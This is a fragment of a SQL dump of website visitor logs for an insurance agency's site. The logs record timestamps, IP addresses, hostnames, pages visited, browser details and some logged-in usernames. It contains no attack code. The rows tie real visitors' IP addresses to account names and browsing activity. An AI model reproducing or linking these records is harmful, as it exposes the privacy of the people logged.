11','us','','','','','roisy','','0','0',0),(16154,'0b_c0f0f143abbc70b7ab33037fa4626ffa','1460403009','108.33.234.35','static-108-33-234-35.tampfl.fios.frontiernet.net','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/about-us/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','51',0),(16157,'0b_346383f9a0f79bfae74350d487b5e049','1460403053','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(16160,'0b_346383f9a0f79bfae74350d487b5e049','1460403054','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(16161,'0b_e5ef07579e02806cf1319a9ebad5f548','1460403562','75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','1920 x 1080','Google','','','','','0','0',0),(16163,'0b_e5ef07579e02806cf1319a9ebad5f548','1460403565','75.99.37.250','ool-4b6325fa.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(16164,'0b_e5ef07579e02806cf1319a9ebad5f548','1460403570','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(16166,'0b_e5ef07579e02806cf1319a9ebad5f548','1460403617','75.99.37.250','ool-4b6325fa.static.optonline.net','/underwriting-cheat-sheets/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(16169,'0b_e5ef07579e02806cf1319a9ebad5f548','1460403618','75.99.37.250','ool-4b6325fa.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(16172,'0b_e5ef07579e02806cf1319a9ebad5f548','1460403619','75.99.37.250','ool-4b6325fa.static.optonline.net','/underwriting-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(16175,'0b_906a5e32c28eb5238a1273db2bf63438','1460404209','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(16178,'0b_906a5e32c28eb5238a1273db2bf63438','1460404209','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(16181,'0b_906a5e32c28eb5238a1273db2bf63438','1460404210','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(16184,'0b_906a5e32c28eb5238a1273db2bf63438','1460404212','69.164.140.246','69.164.140.246.xchangetele.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(16187,'0b_cbca4bb8091db28ba52ad9af486d87ba','1460405613','70.39.157.198','70.39.157.198','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','','',0,'Win7 x64','IE 9','us','','','','','','','0','0',0),(16188,'0b_6a45d90885f26bc529195234e8b9d199','1460405759','69.112.198.211','ool-4570c6d3.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1600 x 900','','','','','','0','0',0),(16191,'0b_6a45d90885f26bc529195234e8b9d199','1460405761','69.112.198.211','ool-4570c6d3.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1600 x 900','','','','','','0','0',0),(16194,'0b_6a45d90885f26bc529195234e8b9d199','1460405767','69.112.198.211','ool-4570c6d3.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1600 x 900','','','','','','0','0',0),(16197,'0b_1eb8f93cc66650c02d67897bcc969dab','1460405803','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(16199,'0b_1eb8f93cc66650c02d67897bcc969dab','1460405804','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(16202,'0b_1eb8f93cc66650c02d67897bcc969dab','1460405812','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(16205,'0b_1eb8f93cc66650c02d67897bcc969dab','1460405819','108.58.88.178','ool-6c3a58b2.static.optonline.net','/underwriting-cheat-sheets/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(16206,'0b_6a45d90885f26bc529195234e8b9d199','1460405820','69.112.198.211','ool-4570c6d3.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1600 x 900','','','','','','0','51',0),(16208,'0b_6a45d90885f26bc529195234e8b9d199','1460405828','69.112.198.211','ool-4570c6d3.dyn.optonline.net','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1600 x 900','','','','','','0','51',0),(16211,'0b_54e33fe0930d79e69e55f9e810f6aca4','1460406460','23.81.207.53','23.81.207.53.rdns.as15003.net','/','Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36','','',0,'Win10','Chrome 40','','','','','','','','0','0',0),(16212,'0b_b6e679c01f1e77ad8d14b1a6b5323513','1460407821','52.71.155.178','nat-service.aws.kontera.com','/robots.txt','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25','','',0,'MacOSX','Safari 8','','','','Unknown Spider','','','','0','0',0),(16215,'0b_b6e679c01f1e77ad8d14b1a6b5323513','1460407821','52.71.155.178','nat-service.aws.kontera.com','/agent-tools/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25','','',0,'MacOSX','Safari 8','','','','','','','','0','0',0),(16217,'0b_b6e679c01f1e77ad8d14b1a6b5323513','1460407874','52.71.155.178','nat-service.aws.kontera.com','/robots.txt','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25','','',0,'MacOSX','Safari 8','','','','','','','','0','0',0),(16220,'0b_b6e679c01f1e77ad8d14b1a6b5323513','1460407875','52.71.155.178','nat-service.aws.kontera.com','/carrier-field-underwriting-guides/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25','','',0,'MacOSX','Safari 8','','','','','','','','0','0',0),(16223,'0b_b6e679c01f1e77ad8d14b1a6b5323513','1460407895','52.71.155.178','nat-service.aws.kontera.com','/underwriting-search/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25','','',0,'MacOSX','Safari 8','','','','','','','','0','0',0),(16226,'0b_a275ccfaafe63548e03209953cf4c603','1460407905','66.249.66.24','crawl-66-249-66-24.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(16227,'0b_b6e679c01f1e77ad8d14b1a6b5323513','1460407917','52.71.155.178','nat-service.aws.kontera.com','/underwriting-cheat-sheets/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25','','',0,'MacOSX','Safari 8','','','','','','','','0','0',0),(16230,'0b_7abd7d18cd29de2e462aaef1c642895e','1460408068','68.180.229.38','b110166.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(16232,'0b_7abd7d18cd29de2e462aaef1c642895e','1460408069','68.180.229.38','b110166.yse.yahoo.net','/SSO/235_14.html','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(16233,'0b_92ecad5e3b31395b06b2ae77249378c4','1460408070','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(16236,'0b_92ecad5e3b31395b06b2ae77249378c4','1460408070','68.180.230.123','b115363.yse.yahoo.net','/SSO/235_14.html','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(16239,'0b_c4cc769cf04a0d9ab5ee7d1ad9cf20f1','1460408470','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(16241,'0b_c4cc769cf04a0d9ab5ee7d1ad9cf20f1','1460408479','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(16244,'0b_580007293ef6ecdc022c1c45776d2c1b','1460408482','66.249.83.150,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(16247,'0b_57ee875b9dde6018bdd935d0bf1af025','1460408482','66.102.6.177,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36','http://www.google.com/search','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(16248,'0b_72083f6ab69d3749ebadaf960652de02','1460411219','5.9.85.4','mj4.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(16251,'0b_72083f6ab69d3749ebadaf960652de02','1460411221','5.9.85.4','mj4.naefmarco.ch','/about-us/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(16253,'0b_72083f6ab69d3749ebadaf960652de02','1460411224','5.9.85.4','mj4.naefmarco.ch','/igo/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(16254,'0b_72083f6ab69d3749ebadaf960652de02','1460411229','5.9.85.4','mj4.naefmarco.ch','/insentives/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(16257,'0b_72083f6ab69d3749ebadaf960652de02','1460411231','5.9.85.4','mj4.naefmarco.ch','/licensing-contracting/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(16260,'0b_72083f6ab69d3749ebadaf960652de02','1460411234','5.9.85.4','mj4.naefmarco.ch','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(16262,'0b_4c404f37f752dc6cb2f1560c29e1e87b','1460411565','104.251.95.92','104.251.95.92','/','Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36','','',0,'Win10','Chrome 40','','','','','','','','0','0',0),(16263,'0b_27c32ffba691fb27bf6625969bbe29a9','1460413039','207.46.13.164','msnbot-207-46-13-164.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(16266,'0b_27c32ffba691fb27bf6625969bbe29a9','1460413078','207.46.13.164','msnbot-207-46-13-164.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(16268,'0b_83bd95999b1d89e2a441731546ed0532','1460413126','157.55.39.210','msnbot-157-55-39-210.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(16269,'0b_b9b28fdb48b1e831819d15acfde7d5b8','1460413466','108.58.164.26','ool-6c3aa41a.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','us','1412 x 794','','','','','','0','0',0),(16271,'0b_b9b28fdb48b1e831819d15acfde7d5b8','1460413468','108.58.164.26','ool-6c3aa41a.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1412 x 794','','','','','','0','0',0),(16272,'0b_b9b28fdb48b1e831819d15acfde7d5b8','1460413475','108.58.164.26','ool-6c3aa41a.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1412 x 794','','','','','','0','0',0),(16274,'0b_b9b28fdb48b1e831819d15acfde7d5b8','1460413555','108.58.164.26','ool-6c3aa41a.static.optonline.net','/browserconfig.xml','Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','us','1412 x 794','','','','','','0','0',0),(16277,'0b_b9b28fdb48b1e831819d15acfde7d5b8','1460413570','108.58.164.26','ool-6c3aa41a.static.optonline.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win8 x64','IE 11','us','1412 x 794','','','','','','0','51',0),(16280,'0b_6f1b8f77a43b9b068a9bc5ae4f381106','1460413632','108.58.164.26','ool-6c3aa41a.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win8','Chrome 49','us','1280 x 720','','','','','','0','0',0),(16281,'0b_6f1b8f77a43b9b068a9bc5ae4f381106','1460413633','108.58.164.26','ool-6c3aa41a.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1280 x 720','','','','','','0','0',0),(16284,'0b_6f1b8f77a43b9b068a9bc5ae4f381106','1460413658','108.58.164.26','ool-6c3aa41a.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1280 x 720','','','','','','0','0',0),(16286,'0b_02d87aa3379bad18cdc24fcf54a8c554','1460414410','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(16289,'0b_b9b28fdb48b1e831819d15acfde7d5b8','1460414552','108.58.164.26','ool-6c3aa41a.static.optonline.net','/members/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win8 x64','IE 11','us','1412 x 794','','','','','','0','51',0),(16292,'0b_1a1d551c1faecd548e0c11d539af81d4','1460414555','108.58.164.26','ool-6c3aa41a.static.optonline.net','/browserconfig.xml','Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','','','','','','','','0','0',0),(16293,'0b_4c52764472a6d106466aa07ad016e413','1460414847','98.197.149.231','c-98-197-149-231.hsd1.tx.comcast.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(16295,'0b_4c52764472a6d106466aa07ad016e413','1460414848','98.197.149.231','c-98-197-149-231.hsd1.tx.comcast.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(16298,'0b_4c52764472a6d106466aa07ad016e413','1460415006','98.197.149.231','c-98-197-149-231.hsd1.tx.comcast.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(16299,'0b_4c52764472a6d106466aa07ad016e413','1460415008','98.197.149.231','c-98-197-149-231.hsd1.tx.comcast.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(16302,'0b_4c52764472a6d106466aa07ad016e413','1460415019','98.197.149.231','c-98-197-149-231.hsd1.tx.comcast.net','/forms/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','51',0),(16304,'0b_4c52764472a6d106466aa07ad016e413','1460415055','98.197.149.231','c-98-197-149-231.hsd1.tx.comcast.net','/browserconfig.xml','Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(16307,'0b_4c52764472a6d106466aa07ad016e413','1460415077','98.197.149.231','c-98-197-149-231.hsd1.tx.comcast.net','/forms/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','51',0),(16310,'0b_ab488e4604594496e99f09e8810392cf','1460415108','144.76.30.236','thoreau.tk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','tk','','','MJ12bot','','','','0','0',0),(16311,'0b_ab488e4604594496e99f09e8810392cf','1460415111','144.76.30.236','thoreau.tk','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','tk','','','MJ12bot','','','','0','0',0),(16314,'0b_c06dbd4200a77a0413b48ef4d503300c','1460415614','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(16316,'0b_4c52764472a6d106466aa07ad016e413','1460416093','98.197.149.231','c-98-197-149-231.hsd1.tx.comcast.net','/forms/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','51',0),(16317,'0b_4c52764472a6d106466aa07ad016e413','1460416147','98.197.149.231','c-98-197-149-231.hsd1.tx.comcast.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','51',0),(16320,'0b_4c52764472a6d106466aa07ad016e413','1460416147','98.197.149.231','c-98-197-149-231.hsd1.tx.comcast.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(16323,'0b_4c52764472a6d106466aa07ad016e413','1460416163','98.197.149.231','c-98-197-149-231.hsd1.tx.comcast.net','/register/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','51',0),(16325,'0b_4c52764472a6d106466aa07ad016e413','1460416260','98.197.149.231','c-98-197-149-231.hsd1.tx.comcast.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko','http://www.empireins.com/register/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','51',0),(16328,'0b_4c52764472a6d106466aa07ad016e413','1460416261','98.197.149.231','c-98-197-149-231.hsd1.tx.comcast.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(16329,'0b_4c52764472a6d106466aa07ad016e413','1460416262','98.197.149.231','c-98-197-149-231.hsd1.tx.comcast.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','51',0),(16332,'0b_4c52764472a6d106466aa07ad016e413','1460416262','98.197.149.231','c-98-197-149-231.hsd1.tx.comcast.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(16334,'0b_4c52764472a6d106466aa07ad016e413','1460416273','98.197.149.231','c-98-197-149-231.hsd1.tx.comcast.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','51',0),(16335,'0b_4c52764472a6d106466aa07ad016e413','1460416304','98.197.149.231','c-98-197-149-231.hsd1.tx.comcast.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','51',0),(16337,'0b_4c52764472a6d106466aa07ad016e413','1460416637','98.197.149.231','c-98-197-149-231.hsd1.tx.comcast.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','51',0),(16338,'0b_eb58614a87dd77ba4a645bc6fea7614b','1460416640','98.197.149.231','c-98-197-149-231.hsd1.tx.comcast.net','/browserconfig.xml','Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','us','','','','','','','0','0',0),(16341,'0b_3a8edd4bb17638951b4c39912ed9fc7b','1460420016','107.152.186.125','107.152.186.125','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','0','0',0),(16343,'0b_1e46eba47ecf3a5da15c4a8a6f79a162','1460421518','192.166.218.214','192-166-218-214.arpa.teredo.pl','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','pl','','','MJ12bot','','','','0','0',0),(16346,'0b_1e46eba47ecf3a5da15c4a8a6f79a162','1460421521','192.166.218.214','192-166-218-214.arpa.teredo.pl','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','pl','','','MJ12bot','','','','0','0',0),(16347,'0b_1e46eba47ecf3a5da15c4a8a6f79a162','1460421523','192.166.218.214','192-166-218-214.arpa.teredo.pl','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','pl','','','MJ12bot','','','','0','0',0),(16349,'0b_e621f71d3b4cd0bdfc58cd4021eca4f0','1460421780','79.143.180.15','mail.ruddog.eu','/','Wget/1.13.4 (linux-gnu)','','',0,'','Wget 1','eu','','','Wget','','','','0','0',0),(16350,'0b_bdb62ffefb20426956a288902ab3ebb0','1460423239','157.55.39.91','msnbot-157-55-39-91.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; 